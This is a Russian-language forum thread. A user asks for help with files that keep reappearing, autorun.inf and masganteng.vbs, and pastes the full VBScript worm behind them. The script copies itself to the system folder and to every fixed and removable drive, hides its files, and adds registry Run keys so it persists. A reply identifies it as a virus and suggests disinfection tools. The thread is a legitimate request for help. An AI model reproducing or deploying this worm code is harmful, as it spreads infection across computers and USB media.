Задолбал autorun... Кто разбирается в скриптах?
У меня жесткий разбит на два диска, плюс подсоединен внешний через USB. Вчера была проблемма: не мог открыть двойным кликом ни один из дисков, только через проводник. В корне каждого диска сидели два файла: autorun.inf и masganteng.vbs которые не удалялись.
Отключил автозапуск, вроде подчистил реестр - диски стали открываться, но по прежнему эти два файла висят в дисках. Они удаляются, но секунд через 15-20 появляются вновь...
в авторане такой текст:
[autorun]
shellexecute=wscript.exe masganteng.vbs
А скрипт содержит следующее:
'masgantenghehehahhaahahahahahahahahaha
on error resume next
dim zipper,syspath,windowpath,desades,x,mf,isi,tf,z,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe masganteng.vbs"
set x = createobject("Scripting.FileSystemObject")
set mf = x.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
zipper = zipper & text.readline
zipper = zipper & vbcrlf
loop
do
'buat file induk
Set windowpath = x.getspecialfolder(0)
Set syspath = x.getspecialfolder(1)
set tf = x.getfile(syspath & "\XpWin.vbs")
tf.attributes = 32
set tf = x.createtextfile(syspath & "\XpWin.vbs",2,true)
tf.write zipper
tf.close
set tf = x.getfile(syspath & "\XpWin.vbs")
tf.attributes = 39
for each desades in x.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=x.getfile(desades.path &"\masganteng.vbs")
tf.attributes =32
set tf=x.createtextfile(desades.path &"\masganteng.vbs",2,true)
tf.write zipper
tf.close
set tf=x.getfile(desades.path &"\masganteng.vbs")
tf.attributes = 39
set tf =x.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=x.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = x.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set z = createobject("WScript.Shell")
z.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","masganteng"
z.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "masganteng"
z.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\masganteng.vbs "
z.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "masganteng"
z.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","masganteng"
z.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "masganteng"
z.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"
z.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "masganteng Virus"
z.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "masganteng"
z.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\XpWin.vbs"
if check <> 1 then
Wscript.sleep 100000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Антивирусы заражения не видят... Может это не зараза? Кто разбирается в этих мануСКРИПТах, помогите!
сделал всё, как пишут в инструкциях по этому поводу: подчистил реестр, отключил автозапуск, создал *.bat файл для удаления тела вируса.. . Из корней дисков скрипт и авторан удаляются, но появляются через 15-20 секунд!
Да вирусня это.
Тебе лечить надо все сразу
И компьютер и USB носители.
Иначе нет никакого смысла. Эта бяка так и будет бегать то с USB на комп то с компа на USB носители.
А для профилактики usb носителей поставь panda usb vaccine
Она свои неперезаписываемые autorun.inf будет создавать.
Что касается лечить то лучше всего из под загрузочного диска с антивирусом.
Что-то типа Alkid live cd(usb)
Есть спец проги удаляющие эти вирусы, погугли сразу найдешь.